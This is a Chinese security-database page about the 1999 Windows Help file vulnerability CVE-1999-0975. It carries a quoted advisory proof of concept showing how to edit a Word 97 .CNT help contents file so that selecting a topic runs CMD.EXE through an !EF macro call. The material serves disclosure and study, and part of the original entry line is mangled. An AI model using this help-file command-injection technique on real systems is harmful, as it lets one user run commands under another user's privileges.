微软帮助文件木马漏洞

微软帮助文件木马漏洞

漏洞ID 1105641 漏洞类型 配置错误
发布时间 1999-12-10 更新时间 2005-05-02
图片[1]-微软帮助文件木马漏洞-安全小百科CVE编号 CVE-1999-0975
图片[2]-微软帮助文件木马漏洞-安全小百科CNNVD-ID CNNVD-199912-042
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19673
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-042
|漏洞详情
Windows帮组系统存在漏洞。本地用户可以借助编辑一个扩展名为.CNT的图元文件目录表的方式,以其他用户的身份执行命令;并在访问.hlp文件时,借助修改主题操作以收录要执行的命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/868/info

The help files for the Windows Help system (*.cnt, *.hlp) can be edited so that they run an arbitrary executable when selected by a user. The executable will run at the privelege level of the user.

The *.cnt files are like tables of contents that tell the help system what to open when each topic is selected. These entries can be edited to cause system and DLL calls and programs to be executed when a topic is chosen. The help files themselves, *.hlp, can be edited in a similar manner.


- Delete C:Program FilesMicrosoft OfficeOfficeWDMAIN8.GID
(kill winhlp32.exe process if necessary)

- Edit C:Program FilesMicrosoft OfficeOfficeWDMAIN8.CNT
which is a text file. You should change the line which has
something like:

3 Word 97 new [email protected]>REF

to read:

3 Word 97 new features=!EF("CMD.EXE","",1)

- Run WinWord and select Help|Contents from menubar.
- Find topic "Word 97 new features" and select it.
- You should see CMD.EXE to run.
|参考资料

来源:BID
名称:868
链接:http://www.securityfocus.com/bid/868

相关推荐: AIX ftpd Remote Buffer Overflow

AIX ftpd Remote Buffer Overflow 漏洞ID 1104612 漏洞类型 Boundary Condition Error 发布时间 1999-09-28 更新时间 1999-09-28 CVE编号 N/A CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享